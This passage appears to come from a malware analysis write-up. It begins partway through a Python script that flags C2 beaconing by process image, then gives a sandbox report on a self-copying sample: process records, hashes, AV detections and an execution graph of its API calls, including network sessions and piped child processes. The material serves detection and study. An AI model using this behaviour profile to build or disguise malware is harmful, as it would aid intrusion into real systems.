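    server answered like a parked or default web host, not with tasking."""
    if not raw_response:
        return "no-response"
    start, headers, body = parse_message(raw_response)
    parts = start.split(" ", 2)
    status = parts[1] if len(parts) > 1 else "?"
    if status == "404":
        return "not-found"
    if status.startswith("3"):
        return "redirect:" + headers.get("location", "")
    if status == "200" and 'window.location.href="/lander"' in body:
        return "parked-lander-redirect"   # constructed label for the openresty page
    if status == "200":
        return "ok-other"
    return "status-" + status


def beaconing_images(sessions, min_hosts=3):
    """Group beacon-shaped requests by process image and return the images
    that reached at least min_hosts distinct Host values, with those hosts."""
    hosts = defaultdict(set)
    for s in sessions:
        if is_beacon_request(s.raw_request):
            _, headers, _ = parse_message(s.raw_request)
            hosts[s.image].add(headers.get("host", s.dst_ip))
    return {img: sorted(h) for img, h in hosts.items() if len(h) >= min_hosts}


def summarize(sessions):
    """One (session id, host, response label) row per session."""
    return [(s.session_id, parse_message(s.raw_request)[1].get("host"),
             classify_response(s.raw_response)) for s in sessions]


if __name__ == "__main__":
    for row in summarize(SESSIONS):
        print(row)
    print(beaconing_images(SESSIONS))
```

Run against these four sessions the image check reports C:\whfkpbh\idtpqzltyfy.exe with all four hosts, while the control request is not flagged; on real traffic the same per-image grouping should be keyed on the executable's hash as well, since the report shows the sample dropping itself under several random names.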

Target ID: 0
Start time: 10:22:53
Start date: 05/08/2024
Path: C:\Users\user\Desktop\mtuXDnH1Di.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mtuXDnH1Di.exe"
Imagebase: 0xec0000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:22:54
Start date: 05/08/2024
Path: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe
Wow64 process (32bit): true
Commandline: "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"
Imagebase: 0x9d0000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 10:22:54
Start date: 05/08/2024
Path: C:\whfkpbh\idtpqzltyfy.exe
Wow64 process (32bit): true
Commandline: C:\whfkpbh\idtpqzltyfy.exe
Imagebase: 0x140000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 10:22:55
Start date: 05/08/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 10:22:55
Start date: 05/08/2024
Path: C:\whfkpbh\amdrhfskpcu.exe
Wow64 process (32bit): true
Commandline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Imagebase: 0xa30000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 100%, Joe Sandbox ML
  • Detection: 92%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 6
Start time: 10:22:56
Start date: 05/08/2024
Path: C:\whfkpbh\idtpqzltyfy.exe
Wow64 process (32bit): true
Commandline: "C:\whfkpbh\idtpqzltyfy.exe"
Imagebase: 0x140000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 8
Start time: 11:45:45
Start date: 05/08/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 11:46:17
Start date: 05/08/2024
Path: C:\whfkpbh\idtpqzltyfy.exe
Wow64 process (32bit): true
Commandline: "c:\whfkpbh\idtpqzltyfy.exe"
Imagebase: 0x140000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 12
Start time: 11:46:18
Start date: 05/08/2024
Path: C:\whfkpbh\amdrhfskpcu.exe
Wow64 process (32bit): true
Commandline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Imagebase: 0xcd0000
File size: 279'552 bytes
MD5 hash: E4B47C06B5EED80FB44CFEA757525634
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 46.6%
Total number of Nodes: 1706
Total number of Limit Nodes: 14
execution_graph: serialized node/edge stream behind the interactive graph (truncated in this extraction). Each node is a decimal id, a hex code address and the named API calls made in that block; "N API calls" marks a collapsed subgraph; "a->b" is a directed edge. Named API calls recoverable from the stream, grouped by the code region in which they occur:
  • ec2764-ec27c8 with ef08b0: Sleep, GetSystemTimeAsFileTime (a sleep / time-check loop)
  • ed1860-ed18cb: SetServiceStatus, SetEvent (service control handler); SetEvent also at ee49e4
  • ec2f90 / ed1bb0 / ee8b60: GetProcessHeap, RtlAllocateHeap, RtlFreeHeap (heap wrappers, called throughout)
  • ecd500, ee48d0 / ef5820: lstrlen / wvsprintfA (string handling)
  • edd83c: GetModuleFileNameA
  • ee1786-ee21ad: socket, setsockopt, gethostbyname, inet_ntoa, inet_addr, htons, connect, send, recv, closesocket (one outbound network session: resolve a host name, connect, send, receive in a loop, close)
  • ed8465-ed89e6 with ec23f2-ec24c1 and eced18: CreatePipe, SetHandleInformation, CreateProcessA, WriteFile, CloseHandle, ReadFile, WaitForSingleObject, DeleteFileA (child process started with redirected pipes, output read back, a file deleted afterwards)
calls 11212->11213 11214 ee1195 11213->11214 11215 ecd530 9 API calls 11214->11215 11216 ee11c3 11215->11216 11217 ed1bb0 2 API calls 11216->11217 11218 ee11d5 11217->11218 11220 ec2f90 2 API calls 11218->11220 11247 ee134c 11218->11247 11219 ef01a0 9 API calls 11221 ee13d8 11219->11221 11222 ee1226 11220->11222 11223 ef1050 8 API calls 11221->11223 11224 eda810 9 API calls 11222->11224 11225 ee13e4 11223->11225 11227 ee1258 11224->11227 11226 ec2f90 2 API calls 11225->11226 11228 ee1422 11226->11228 11231 ed1bb0 2 API calls 11227->11231 11229 ef01a0 9 API calls 11228->11229 11230 ee144a 11229->11230 11232 ef1050 8 API calls 11230->11232 11234 ee1288 11231->11234 11233 ee1456 11232->11233 11235 ed1bb0 2 API calls 11233->11235 11236 eeb500 8 API calls 11234->11236 11234->11247 11237 ee1478 11235->11237 11238 ee12fa 11236->11238 11242 ef01a0 9 API calls 11237->11242 11239 ec2f90 2 API calls 11238->11239 11240 ee1310 11239->11240 11241 ecd530 9 API calls 11240->11241 11243 ee1328 11241->11243 11244 ee14e2 11242->11244 11245 ed1bb0 2 API calls 11243->11245 11246 ef1050 8 API calls 11244->11246 11245->11247 11248 ee14f1 11246->11248 11247->11219 11252 ec2f90 2 API calls 11248->11252 11287 ee16c2 11248->11287 11249 ec2f90 2 API calls 11250 ee1702 11249->11250 11251 ef01a0 9 API calls 11250->11251 11253 ee1728 11251->11253 11254 ee1595 11252->11254 11255 ef1050 8 API calls 11253->11255 11256 ef01a0 9 API calls 11254->11256 11257 ee1734 11255->11257 11258 ee15d0 11256->11258 11261 ed1bb0 2 API calls 11257->11261 11259 ef1050 8 API calls 11258->11259 11260 ee15df 11259->11260 11264 ec2f90 2 API calls 11260->11264 11262 ee174e 11261->11262 11263 ee1786 socket 11262->11263 11265 ef1050 8 API calls 11262->11265 11266 ee17de 11263->11266 11267 ee17b2 11263->11267 11268 ee1600 11264->11268 11265->11263 11269 ee17fb setsockopt 11266->11269 11270 ee18c4 gethostbyname 11266->11270 11271 ed1bb0 2 API calls 11268->11271 11272 ee1866 11269->11272 11270->11211 11274 ee18ed inet_ntoa 
inet_addr htons connect 11270->11274 11273 ee1628 11271->11273 11272->11270 11277 ef5820 wvsprintfA 11273->11277 11276 ee19ca 11274->11276 11279 ee19e0 11274->11279 11278 ee165e 11277->11278 11280 ed1bb0 2 API calls 11278->11280 11281 ee1a00 send 11279->11281 11282 ee167a 11280->11282 11286 ee1a1e 11281->11286 11283 ef01a0 9 API calls 11282->11283 11284 ee16b3 11283->11284 11285 ef1050 8 API calls 11284->11285 11285->11287 11288 edd990 8 API calls 11286->11288 11291 ee1a3e 11286->11291 11287->11249 11289 ee1add recv 11288->11289 11290 ee21ad closesocket 11289->11290 11303 ee1b57 11289->11303 11293 ee2210 11290->11293 11292 ec1df0 GetSystemTimeAsFileTime 11292->11303 11293->11211 11294 eeb500 8 API calls 11293->11294 11294->11211 11295 ed0110 8 API calls 11295->11303 11296 ed4290 8 API calls 11296->11303 11297 eda810 9 API calls 11297->11303 11298 ee2135 recv 11299 ee2187 11298->11299 11298->11303 11299->11290 11300 ed1bb0 GetProcessHeap RtlFreeHeap 11300->11303 11301 ecc110 9 API calls 11301->11303 11302 ec2f90 GetProcessHeap RtlAllocateHeap 11302->11303 11303->11290 11303->11292 11303->11295 11303->11296 11303->11297 11303->11298 11303->11299 11303->11300 11303->11301 11303->11302 11304->11209 11305->11212 10356 edfcd7 10368 edf850 10356->10368 10357 ee8b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10357->10368 10360 ed8bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10360->10368 10361 ef1190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10361->10368 10364 ee024a 10365 ed2c90 4 API calls 10364->10365 10367 ee0299 10364->10367 10365->10367 10369 ed2c90 4 API calls 10367->10369 10370 ee0368 10367->10370 10368->10357 10368->10360 10368->10361 10368->10364 10368->10370 10371 eeab60 10368->10371 10381 ed2c90 10368->10381 10386 ee0790 10368->10386 10369->10370 10395 ec1170 10370->10395 10372 eeab77 10371->10372 10373 eead05 10372->10373 10374 eeabea 10372->10374 10408 eca850 10373->10408 10376 eeac6c 10374->10376 10377 eeac0c 
10374->10377 10379 edd9a0 4 API calls 10376->10379 10399 edd9a0 10377->10399 10380 eeac21 10379->10380 10380->10368 10383 ed2cb9 10381->10383 10382 ed2ce0 10382->10368 10383->10382 10384 ee3a80 4 API calls 10383->10384 10385 ed2d76 10384->10385 10385->10368 10387 ee0a0d 10386->10387 10388 ee07cb 10386->10388 10389 eca850 4 API calls 10387->10389 10390 ee0926 10388->10390 10391 ee07e5 10388->10391 10394 ee0882 10389->10394 10392 edd9a0 4 API calls 10390->10392 10393 edd9a0 4 API calls 10391->10393 10392->10394 10393->10394 10394->10368 10396 ec119e 10395->10396 10397 ec1396 10396->10397 10398 ed2eb0 2 API calls 10396->10398 10398->10396 10402 edd9c5 10399->10402 10400 edda26 10400->10380 10401 ed2c90 4 API calls 10404 eddb90 10401->10404 10402->10400 10403 ed2c90 4 API calls 10402->10403 10405 eddadb 10402->10405 10403->10405 10406 ec1170 2 API calls 10404->10406 10405->10401 10405->10404 10407 eddc9f 10406->10407 10407->10380 10409 eca8dc 10408->10409 10410 ecaa1a 10409->10410 10411 ed2c90 4 API calls 10409->10411 10413 ecacfe 10410->10413 10416 ee3a80 10410->10416 10411->10410 10413->10380 10414 ee3a80 4 API calls 10415 ecaa81 10414->10415 10415->10413 10415->10414 10417 ee3ab7 10416->10417 10419 ee3ae7 10416->10419 10418 ece2c0 2 API calls 10417->10418 10420 ee3ade 10418->10420 10419->10415 10420->10419 10421 ed2eb0 2 API calls 10420->10421 10421->10419 10422 ec2cd0 10427 ed1cc0 10422->10427 10434 eeb450 10427->10434 10435 eeb46a 10434->10435 10436 ef00f0 8 API calls 10435->10436 10437 eeb49b 10436->10437 10442 ec28d0 10443 ec28e7 10442->10443 10445 ec2903 10442->10445 10444 ec2935 10445->10444 10446 ec29b4 10445->10446 10447 ec2a46 ReadFile 10445->10447 10448 ec2a61 10447->10448 10449 ecfed0 10450 ecfeeb 10449->10450 10451 ecbb70 8 API calls 10450->10451 10452 ecff10 10451->10452 10455 ee3080 10452->10455 10456 ee308e 10455->10456 10457 ed4290 8 API calls 10456->10457 10458 ecff27 10457->10458 11306 ecf9d0 11307 ecf9e6 11306->11307 11310 ee3c50 11307->11310 
11309 ecfa49 11311 ee3c6f 11310->11311 11314 ece320 11311->11314 11313 ee3c86 11313->11309 11315 ece334 11314->11315 11316 ee3f00 8 API calls 11315->11316 11317 ece3ce 11316->11317 11317->11313 10459 ee0ad0 10462 ecb780 10459->10462 10465 edd750 10462->10465 10466 edd75a 10465->10466 10468 edd77e 10465->10468 10467 ed2eb0 2 API calls 10466->10467 10467->10468 10301 ee45a9 10302 ee45bd 10301->10302 10309 ee0610 10302->10309 10306 ee45ee 10307 ee4656 10306->10307 10308 ee4672 ExitProcess 10307->10308 10310 ee062b 10309->10310 10316 ecb690 10310->10316 10312 ee0660 10313 eefde0 10312->10313 10314 eefdf7 10313->10314 10315 eefe12 GetStdHandle GetStdHandle GetStdHandle 10313->10315 10314->10315 10315->10306 10317 ecb6b6 GetProcessHeap HeapAlloc 10316->10317 10317->10312 10469 eda0a6 10477 eda0b0 10469->10477 10470 ed6810 8 API calls 10470->10477 10471 eda5a1 10475 ed1bb0 2 API calls 10471->10475 10472 ed6810 8 API calls 10476 eda428 10472->10476 10473 ec1ca0 9 API calls 10473->10476 10474 ec1ca0 9 API calls 10474->10477 10478 eda606 10475->10478 10476->10471 10476->10472 10476->10473 10477->10470 10477->10474 10477->10476 11369 ecab27 11372 ecab30 11369->11372 11370 ecacfe 11371 ee3a80 4 API calls 11371->11372 11372->11370 11372->11371 11373 ec3520 11374 ec353f 11373->11374 11375 ed68d0 4 API calls 11374->11375 11376 ec355e 11374->11376 11375->11376 11318 edc9a0 11319 edc9be 11318->11319 11324 ecd500 lstrlen 11319->11324 11321 edc9fd 11325 ecdf70 11321->11325 11324->11321 11328 ee0b70 11325->11328 11327 ecdf8a 11329 ee0baf 11328->11329 11330 ee0c9b 11329->11330 11331 ee0ca8 11329->11331 11332 ed66f0 8 API calls 11330->11332 11333 ece320 8 API calls 11331->11333 11334 ee0ca6 11331->11334 11332->11334 11333->11334 11334->11327 10479 ee22a0 10480 ee22fb 10479->10480 10481 ef50e0 3 API calls 10480->10481 10482 ee247d 10481->10482 10483 ee9580 10 API calls 10482->10483 10484 ee24c2 10483->10484 10485 ece430 lstrlen 10484->10485 10486 ee24e6 10485->10486 10487 ec2f90 2 API 
calls 10486->10487 10488 ee2511 10487->10488 10489 ed1bb0 2 API calls 10488->10489 10491 ee2561 10489->10491 10490 ef08b0 GetSystemTimeAsFileTime 10490->10491 10491->10490 10492 edd990 8 API calls 10491->10492 10495 ed2120 5 API calls 10491->10495 10496 eefa80 3 API calls 10491->10496 10498 ed1200 12 API calls 10491->10498 10499 ee0d80 22 API calls 10491->10499 10500 ec2f90 GetProcessHeap RtlAllocateHeap 10491->10500 10501 ecd530 9 API calls 10491->10501 10502 ed1bb0 GetProcessHeap RtlFreeHeap 10491->10502 10503 ef1050 8 API calls 10491->10503 10504 ed2c30 8 API calls 10491->10504 10506 ecd760 51 API calls 10491->10506 10507 edd0f0 31 API calls 10491->10507 10508 ee4af0 10491->10508 10520 edc770 10491->10520 10493 ee2bec Sleep 10492->10493 10524 ed8cf0 10493->10524 10495->10491 10496->10491 10498->10491 10499->10491 10500->10491 10501->10491 10502->10491 10503->10491 10504->10491 10506->10491 10507->10491 10509 ee4b32 10508->10509 10510 ec2f90 2 API calls 10509->10510 10511 ee4b55 10510->10511 10512 ec2f90 2 API calls 10511->10512 10513 ee4b78 10512->10513 10531 ed71e0 10513->10531 10516 ed1bb0 2 API calls 10517 ee4bb0 10516->10517 10518 ed1bb0 2 API calls 10517->10518 10519 ee4bc5 10518->10519 10519->10491 10521 edc79b 10520->10521 10522 ed4290 8 API calls 10521->10522 10523 edc86a 10521->10523 10522->10523 10523->10491 10528 ed8d16 10524->10528 10525 ed8dca DeleteFileA 10525->10528 10526 ed8f44 10526->10491 10528->10525 10528->10526 10529 ed8ee8 10528->10529 10537 ec1c30 10528->10537 10529->10526 10542 ed7d40 10529->10542 10532 ed7202 10531->10532 10533 ec2f90 2 API calls 10532->10533 10534 ed7648 10533->10534 10535 ed1bb0 2 API calls 10534->10535 10536 ed7684 10535->10536 10536->10516 10546 ecf270 10537->10546 10539 ec1c6a 10550 edd720 10539->10550 10543 ed7d69 10542->10543 10545 ed7e27 10543->10545 10561 ecbba0 10543->10561 10545->10529 10547 ecf29a 10546->10547 10548 ed0110 8 API calls 10547->10548 10549 ecf2a2 10548->10549 10549->10539 10551 edd72e 
10550->10551 10552 ec1c70 10551->10552 10554 ed2a80 10551->10554 10552->10528 10557 ece100 10554->10557 10556 ed2a8f 10556->10552 10558 ece111 10557->10558 10559 ec1000 8 API calls 10558->10559 10560 ece127 10559->10560 10560->10556 10564 ee30b0 10561->10564 10565 ee30e4 10564->10565 10568 ed66f0 10565->10568 10567 ecbbae 10567->10545 10569 ed670d 10568->10569 10570 ed0110 8 API calls 10569->10570 10571 ed6738 10570->10571 10571->10567 10576 ef4eb3 10577 ef4ec5 10576->10577 10579 ec7a04 132 API calls 10577->10579 10578 ef4ec9 10579->10578 11125 eca830 11128 edb720 11125->11128 11127 eca83f 11129 edb72e 11128->11129 11132 ecd500 lstrlen 11129->11132 11131 edb739 11131->11127 11132->11131 11377 ec1130 11378 ec114b 11377->11378 11379 ee4420 8 API calls 11378->11379 11380 ec115b 11379->11380 11381 ecf330 11384 ecd500 lstrlen 11381->11384 11383 ecf38f 11384->11383 11385 ecfb30 11386 ed2df0 8 API calls 11385->11386 11387 ecfb55 11386->11387 10580 ed7eb0 10581 ed7eba 10580->10581 10582 ed7ec0 10580->10582 10583 ed2eb0 2 API calls 10581->10583 10583->10582 11392 ecbd08 11397 ecbd10 11392->11397 11393 eca4e0 lstrlen 11393->11397 11394 ecbdbb OpenProcess 11395 ecbe02 TerminateProcess 11394->11395 11394->11397 11395->11397 11398 ecbe67 CloseHandle 11395->11398 11396 ecbedd Process32Next 11396->11397 11399 ecbf19 CloseHandle 11396->11399 11397->11393 11397->11394 11397->11396 11397->11398 11398->11397 11401 ecbf47 11399->11401 9387 ef4f8a 9388 ef4ec5 9387->9388 9391 ec7a04 9388->9391 9627 ed1bb0 9391->9627 9395 ec7a60 9396 ed1bb0 2 API calls 9395->9396 9397 ec7aa7 9396->9397 9398 ec2f90 2 API calls 9397->9398 9399 ec7b0e 9398->9399 9400 ed1bb0 2 API calls 9399->9400 9401 ec7b22 9400->9401 9402 ec2f90 2 API calls 9401->9402 9403 ec7bad 9402->9403 9404 ed1bb0 2 API calls 9403->9404 9405 ec7bc3 9404->9405 9406 ec2f90 2 API calls 9405->9406 9407 ec7c07 9406->9407 9408 ed1bb0 2 API calls 9407->9408 9409 ec7c7a 9408->9409 9410 ec2f90 2 API calls 9409->9410 9411 ec7cb7 9410->9411 
9412 ed1bb0 2 API calls 9411->9412 9413 ec7d1b 9412->9413 9414 ec2f90 2 API calls 9413->9414 9415 ec7d90 9414->9415 9416 ed1bb0 2 API calls 9415->9416 9417 ec7da6 9416->9417 9418 ec2f90 2 API calls 9417->9418 9419 ec7dfc 9418->9419 9420 ed1bb0 2 API calls 9419->9420 9421 ec7e1a 9420->9421 9422 ec2f90 2 API calls 9421->9422 9423 ec7e73 9422->9423 9424 ed1bb0 2 API calls 9423->9424 9425 ec7e87 9424->9425 9426 ec2f90 2 API calls 9425->9426 9427 ec7ef1 9426->9427 9428 ed1bb0 2 API calls 9427->9428 9429 ec7f05 9428->9429 9430 ec2f90 2 API calls 9429->9430 9431 ec7f42 9430->9431 9432 ed1bb0 2 API calls 9431->9432 9433 ec7f62 9432->9433 9434 ec2f90 2 API calls 9433->9434 9435 ec7fe8 9434->9435 9436 ed1bb0 2 API calls 9435->9436 9437 ec8004 9436->9437 9438 ec2f90 2 API calls 9437->9438 9439 ec8093 9438->9439 9440 ed1bb0 2 API calls 9439->9440 9441 ec80a7 9440->9441 9442 ec2f90 2 API calls 9441->9442 9443 ec8106 9442->9443 9444 ed1bb0 2 API calls 9443->9444 9445 ec818f 9444->9445 9446 ec2f90 2 API calls 9445->9446 9447 ec81d1 9446->9447 9448 ed1bb0 2 API calls 9447->9448 9449 ec81eb 9448->9449 9450 ec2f90 2 API calls 9449->9450 9451 ec8230 9450->9451 9452 ed1bb0 2 API calls 9451->9452 9453 ec8268 9452->9453 9454 ed1bb0 2 API calls 9453->9454 9455 ec82b6 9454->9455 9635 ed2eb0 GetProcessHeap RtlFreeHeap 9455->9635 9459 ec839b 9460 ec2f90 2 API calls 9459->9460 9461 ec83c0 GetEnvironmentVariableA 9460->9461 9462 ed1bb0 2 API calls 9461->9462 9463 ec83f9 CreateMutexA 9462->9463 9465 ec8480 CreateMutexA CreateMutexA 9463->9465 9467 ec8521 9465->9467 9468 ec868b 9467->9468 9469 ec8587 GetTickCount 9467->9469 9644 ed5200 9468->9644 9470 ec85a5 9469->9470 9473 ec2f90 2 API calls 9470->9473 9472 ec86a4 GetCommandLineA 9474 ec86cb 9472->9474 9476 ec85bd 9473->9476 9475 ec2f90 2 API calls 9474->9475 9477 ec874d 9475->9477 9478 ed1bb0 2 API calls 9476->9478 9480 ed1bb0 2 API calls 9477->9480 9479 ec8622 9478->9479 9479->9468 9481 ec878c 9480->9481 9482 ec9235 GetCommandLineA 
9481->9482 9484 ec2f90 2 API calls 9481->9484 9746 eeb990 9482->9746 9486 ec87dd 9484->9486 9487 ed1bb0 2 API calls 9486->9487 9489 ec8812 9487->9489 9488 ec9271 9749 ecd500 lstrlen 9488->9749 9490 ec8842 9489->9490 9492 ec2800 ExitProcess 9489->9492 9495 ec2f90 2 API calls 9490->9495 9492->9490 9493 ec9323 GetModuleFileNameA 9750 eca4e0 lstrlen 9493->9750 9496 ec88ab 9495->9496 9498 ed1bb0 2 API calls 9496->9498 9497 ec93ae 9500 eca4e0 lstrlen 9497->9500 9499 ec88db 9498->9499 9501 ec8926 9499->9501 9503 ec2800 ExitProcess 9499->9503 9502 ec945a 9500->9502 9775 ece430 9501->9775 9505 eca4e0 lstrlen 9502->9505 9503->9501 9520 ec947b 9505->9520 9506 ec8961 9507 ec2f90 2 API calls 9506->9507 9508 ec8978 9507->9508 9512 ed1bb0 2 API calls 9508->9512 9509 ec9764 9821 ee3cf0 9509->9821 9511 ec97b2 9513 ec97d4 9511->9513 9514 ec2800 ExitProcess 9511->9514 9517 ec89cb 9512->9517 9830 ee9b00 9513->9830 9514->9513 9516 ec981d 9518 ef08b0 GetSystemTimeAsFileTime 9516->9518 9535 ec8ab7 9517->9535 9519 ec9830 9518->9519 9924 ee48d0 9519->9924 9520->9509 9521 ec9744 9520->9521 9752 ed8a70 9520->9752 9521->9509 9525 ec956f 9758 ee9580 9525->9758 9527 ec971a 9528 ec2800 ExitProcess 9527->9528 9528->9521 9530 ec958b 9530->9527 9531 ec2f90 2 API calls 9530->9531 9533 ec9651 9531->9533 9532 ec8b61 Sleep 9532->9535 9771 ecd500 lstrlen 9533->9771 9535->9532 9536 ed1530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9535->9536 9538 ec8c99 Sleep 9535->9538 9555 ec8cd8 9535->9555 9780 ed2120 9535->9780 9791 ef08b0 GetSystemTimeAsFileTime 9535->9791 9536->9535 9537 ec9666 MessageBoxA 9541 ed1bb0 2 API calls 9537->9541 9538->9535 9539 ed2120 5 API calls 9539->9555 9544 ec96ef 9541->9544 9542 ec98a8 9547 ec2f90 2 API calls 9542->9547 9554 ec99ff 9542->9554 9543 ec8de6 9806 ed1530 9543->9806 9772 ec2800 9544->9772 9550 ec99e4 9547->9550 9549 ec8e04 9556 ec8e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9549->9556 9557 ec91a4 9549->9557 9928 ecc540 9550->9928 9551 ec8d8c 
Sleep 9551->9555 9553 ec9a71 9561 ec9aa3 CloseHandle SetFileAttributesA CopyFileA 9553->9561 9583 ec9d65 9553->9583 9554->9553 9933 edee80 9554->9933 9555->9539 9555->9543 9793 ecbbc0 9555->9793 9559 ec2f90 2 API calls 9556->9559 9816 eefa80 9557->9816 9571 ec8eff 9559->9571 9560 ec9a32 9562 ec9a53 9560->9562 9567 ec2800 ExitProcess 9560->9567 9564 ec9b1a SetFileAttributesA 9561->9564 9565 ec9c78 9561->9565 9944 ec26e0 9562->9944 9568 ec9b73 9564->9568 9569 ec9b5d 9564->9569 9974 ee3110 9565->9974 9567->9562 9577 ec9c2a Sleep 9568->9577 9964 ed7a50 9568->9964 9952 ed0500 OpenSCManagerA 9569->9952 9570 ec9210 9573 ec2800 ExitProcess 9570->9573 9575 ed1bb0 2 API calls 9571->9575 9573->9482 9574 ed2120 5 API calls 9574->9583 9580 ec8f61 9575->9580 9579 eefa80 3 API calls 9577->9579 9579->9565 9588 ec2f90 2 API calls 9580->9588 9599 ec904a 9580->9599 9583->9574 9584 ec9e57 SetFileAttributesA CopyFileA SetFileAttributesA 9583->9584 9586 ecbbc0 8 API calls 9583->9586 9593 ece430 lstrlen 9584->9593 9585 ec2800 ExitProcess 9585->9583 9592 ec9e1a Sleep 9586->9592 9596 ec8fbf 9588->9596 9589 ec913d SetFileAttributesA 9589->9557 9590 ec9113 SetFileAttributesA 9590->9557 9592->9583 9592->9584 9594 ec9ee1 9593->9594 9595 ec2f90 2 API calls 9594->9595 9598 ec9efd 9595->9598 9597 ed1bb0 2 API calls 9596->9597 9597->9599 9600 ec2f90 2 API calls 9598->9600 9599->9589 9599->9590 9601 ec9fbe 9600->9601 9602 ed1bb0 2 API calls 9601->9602 9603 eca039 9602->9603 9978 ed0dc0 9603->9978 9605 eca050 9606 ed1bb0 2 API calls 9605->9606 9607 eca06b 9606->9607 9982 ed1200 9607->9982 9610 ec2f90 2 API calls 9611 eca0ae 9610->9611 9612 ec2f90 2 API calls 9611->9612 9613 eca0c6 9612->9613 10003 ef5820 9613->10003 9615 eca0f2 9616 ed1bb0 2 API calls 9615->9616 9617 eca115 9616->9617 9618 ed1bb0 2 API calls 9617->9618 9619 eca127 9618->9619 9620 eefa80 3 API calls 9619->9620 9621 eca185 9620->9621 9622 eca24e CreateThread 9621->9622 9623 eca2cd 9622->9623 9624 eca2a2 9622->9624 9625 eca310 Sleep 
9623->9625 10006 ecc660 StartServiceCtrlDispatcherA 9624->10006 9625->9625 9628 ed1bd0 9627->9628 9629 ed2eb0 2 API calls 9628->9629 9630 ec7a18 9629->9630 9631 ec2f90 9630->9631 9632 ec2feb 9631->9632 10007 ece2c0 9632->10007 9634 ec3034 9634->9395 9636 ec8388 9635->9636 9637 ef50e0 9636->9637 9638 ef5186 GetSystemTime 9637->9638 9639 ef5172 9637->9639 9640 ef51be 9638->9640 9639->9638 9641 ef08b0 GetSystemTimeAsFileTime 9640->9641 9642 ef52a7 GetTickCount 9641->9642 9643 ef52d4 9642->9643 9643->9459 9645 ed521d 9644->9645 9646 ed52b2 GetVersionExA 9645->9646 10010 ecb7a0 AllocateAndInitializeSid 9646->10010 9652 ec2f90 2 API calls 9653 ed5652 9652->9653 10030 ecd530 9653->10030 9656 ed1bb0 2 API calls 9661 ed5692 9656->9661 9657 ed5357 9658 ed5496 CreateDirectoryA 9657->9658 9659 ec2f90 2 API calls 9658->9659 9660 ed54bb 9659->9660 9662 ed1bb0 2 API calls 9660->9662 10034 ed1d90 9661->10034 9664 ed550a 9662->9664 9664->9652 9665 ed56cb 9666 ed575d 9665->9666 9667 ed56d6 DeleteFileA RemoveDirectoryA 9665->9667 9668 ecf0d0 6 API calls 9666->9668 9667->9666 9669 ed5776 9668->9669 9670 ed581e CreateDirectoryA 9669->9670 9671 ed585b 9670->9671 9672 ece430 lstrlen 9671->9672 9673 ed58cb CreateDirectoryA 9672->9673 9674 ed5917 9673->9674 9675 ec2f90 2 API calls 9674->9675 9676 ed592d 9675->9676 9677 ec2f90 2 API calls 9676->9677 9678 ed59e9 9677->9678 9679 ed1bb0 2 API calls 9678->9679 9680 ed5a07 9679->9680 9681 ecd530 9 API calls 9680->9681 9682 ed5a77 9681->9682 9683 ed1bb0 2 API calls 9682->9683 9684 ed5aaa 9683->9684 9685 ed1d90 5 API calls 9684->9685 9686 ed5ad7 9685->9686 9687 ed64f5 9686->9687 9688 ed5b07 9686->9688 9689 ed5c42 9686->9689 9692 ece430 lstrlen 9687->9692 9691 ec2f90 2 API calls 9688->9691 9690 ec2f90 2 API calls 9689->9690 9693 ed5c61 9690->9693 9694 ed5b2d 9691->9694 9695 ed6549 SetFileAttributesA 9692->9695 9696 ef5820 wvsprintfA 9693->9696 9697 ef5820 wvsprintfA 9694->9697 9703 ed657e 9695->9703 9698 ed5c87 9696->9698 9699 ed5b5a 9697->9699 
